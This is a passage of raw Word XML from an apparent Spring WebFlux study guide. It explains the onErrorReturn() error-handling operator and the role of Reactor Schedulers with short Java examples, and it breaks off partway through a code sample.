    <w:p w14:paraId="13BB1D9D" w14:textId="3494ACF9" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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onErrorReturn() is another operator in Spring WebFlux used to handle errors in a reactive stream. It is similar to onErrorResume(), but instead of providing a new Mono or Flux as a fallback, it simply returns a static value when an error occurs. This operator allows you to handle errors by providing a predefined value that will be emitted instead of the error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6BDEA3" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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How onErrorReturn() Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2148DB73"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hen an error occurs in a reactive pipeline, onErrorReturn() replaces the error with a static value (rather than a new reactive stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03178227"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is operator is typically used when you want to provide a default value instead of an error when something goes wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8CE90" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79492D39"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ono&lt;T&gt; onErrorReturn(T fallback);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758DC6C"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fallback</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The value that will be returned when an error occurs in the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770CC052" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3B069F"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Here’s an example to illustrate how onErrorReturn() works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679CCEA"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B70DF8" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9F9838"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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F6DDD" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E46A91A"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D220FD"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Mono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9BBFF"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onErrorReturn("Fallback Value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAE301A" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4178490F"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data.subscribe(System.out::println);  // Output: Fallback Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E97A8C7"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5B32BC73" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44745FAB"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static Mono&lt;String&gt; getDataFromService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F86FF6F"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Mono.error(new RuntimeException("Service error"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390216C6"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20306E6B"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7D08B318"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this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB90B6"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getDataFromService() method returns a Mono.error() that emits an error (RuntimeException).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097B6CAA"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onErrorReturn() operator catches the error and returns the predefined fallback value "Fallback Value".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04615D"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subscriber gets the fallback value ("Fallback Value") instead of the error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4618220C" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF0A77"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tatic Fallback Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unlike onErrorResume(), which allows you to return a new Mono or Flux (possibly involving more complex logic), onErrorReturn() simply returns a static value. It's a more simplified version of error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1447B"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No Further Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When an error occurs, onErrorReturn() doesn’t allow for further processing or transformations. It just replaces the error with a default value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CD06F1"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impler Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use onErrorReturn() when you want a simple fallback value and don't need to execute additional logic or return a new reactive stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22900061" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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 with onErrorReturn():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B3EE4"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ono&lt;String&gt; data = getDataFromService()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72586666"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onErrorReturn("Error Fallback");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D5263" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2E7934"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data.subscribe(System.out::println);  // Output: Error Fallback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ECA68B" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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omparison with onErrorResume():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDF67E"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onErrorResume()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This operator allows you to replace an error with an entirely new Mono or Flux, enabling more flexibility and complex fallback logic (such as calling another service or returning a different stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA60B01"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lastRenderedPageBreak/>
        <w:t>onErrorReturn()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This operator provides a quick and simple fallback by returning a static value when an error occurs, without involving any additional stream or logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7000E6EC" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA7E976"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When you need a default value</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: onErrorReturn() is useful when you need to return a simple, predefined fallback value (e.g., 0, null, "Error"), rather than re-initiating the entire stream logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB44C47"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imple error handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you don't require complex error recovery logic and just want to return a static value as a fallback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DF15BC" w14:textId="77777777" w:rsidR="00E53F1F"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EFA37E8">
          <v:rect id="_x0000_i2313" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5151B43F" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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 in Real-world Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467CC4C1"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agine you are reading data from a file, and if an error occurs (e.g., file not found), you want to return a default response instead of throwing an error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B950139"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ono&lt;String&gt; readFile() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CAAC4"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Mono.error(new RuntimeException("File not found"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241010D9"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onErrorReturn("Default File Content");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17632109"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50F725B1" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346DE5D2"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adFile().subscribe(System.out::println);  // Output: Default File Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716800E"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this case, instead of propagating the error (file not found), it directly returns "Default File Content" as the fallback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353B7FF7" w14:textId="77777777" w:rsidR="00E53F1F"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03F7C0C">
          <v:rect id="_x0000_i2314" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A8E957"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conclusion, onErrorReturn() is useful when you want a simple fallback mechanism that returns a predefined value when an error occurs in a reactive stream. It is ideal for situations where you don't need complex error handling or further processing but simply need to return a static value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B651CF7"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11B31C8">
          <v:rect id="_x0000_i2315" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4114E17C" w14:textId="51A3F6FE"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16" w:name="_Toc196307996"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the role of Schedulers in reactive programming with Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="516"/>
    </w:p>
    <w:p w14:paraId="5765DCA7" w14:textId="4FA1D505" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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n reactive programming with Spring WebFlux, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Schedulers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> play an essential role in managing the execution context of reactive streams, determining on which thread the operations in the reactive pipeline should be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CEC89C"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chedulers allow you to control how and where the reactive operations (such as data fetching, computation, etc.) run. This is particularly useful for managing concurrency, ensuring non-blocking behavior, and offloading tasks to specific threads or thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF2EFA0" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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Role of Schedulers in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDF96C7"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Managing Thread Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A83F56" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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n reactive programming, operations are typically executed asynchronously. The default behavior is to execute operations on the calling thread, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Schedulers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow you to shift execution to different threads or thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B92A76C" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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By using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Schedulers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can control whether an operation runs on the main thread, a worker thread, or a dedicated thread pool, improving resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DCAA0"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nsuring Non-blocking Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC347A5" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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With Spring WebFlux, you typically want operations to be non-blocking. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Schedulers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> help ensure that blocking calls are offloaded to dedicated threads, preventing the main thread from being blocked, which is essential for handling a large number of concurrent requests efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA077E3"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Managing Concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6023E527" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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chedulers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow fine-grained control over concurrency. For instance, you may want to use a specific thread pool for CPU-intensive operations and another one for I/O-bound operations. This enables optimized resource usage and ensures the system remains responsive under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1AF104"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Parallel Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D1D38" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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With reactive programming, multiple operations may run concurrently (e.g., making multiple API calls). </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Schedulers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow these tasks to run in parallel, which is crucial for maintaining performance in scenarios where multiple independent tasks need to be executed concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76769CFF" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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Types of Schedulers in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F71D08F"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 WebFlux provides several built-in schedulers, each tailored for different use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5AC369"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chedulers.parallel()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107553C" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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is scheduler is used for CPU-bound operations that can run in parallel. It typically uses a fixed-size thread pool with a number of threads equal to the number of available CPU cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D9A37" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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t is ideal for tasks that require significant computation but should not block the main thread (e.g., complex data transformations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF20B64"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lastRenderedPageBreak/>
        <w:t>Schedulers.elastic()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ABEC40" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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is scheduler is used for I/O-bound operations that might involve waiting (e.g., waiting for data from a database or external API). It provides a thread pool that can dynamically grow to accommodate more threads as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C92FC77" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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t is suitable for handling tasks that might block (like reading files or making network requests) without blocking the calling thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEC10F5"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chedulers.single()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64537BE4" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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is scheduler ensures that the operations are executed on a single thread. This can be useful for tasks that need to be executed sequentially on the same thread to avoid race conditions or for simple single-threaded tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C4C174"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chedulers.immediate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E6100" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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is scheduler runs operations on the same thread that initiated the subscription. It does not shift execution to any other thread, which is helpful in certain cases where you do not want to offload the task to a different thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081BF92C" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F"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 Usage of Schedulers in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3432BAFE"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Let's look at a simple example of how to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Schedulers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193C69FC"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBA9581"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scheduler.Schedulers;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A064F1B" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F157F19"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ReactiveExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B9B614" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8AE87E"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050611B4"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Mono.just("Reactive World")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E1D778"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shOn(Schedulers.boundedElastic())  // Move to an elastic thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7713EF75"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map(value -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D645AD"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Simulating some CPU-bound work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013BE687"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value + " - Transformed";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72077300"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22D3BC6A"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ubscribeOn(Schedulers.parallel())  // Move to parallel thread pool for CPU-bound tasks</w:t>
      </w:r>
    </w:p>
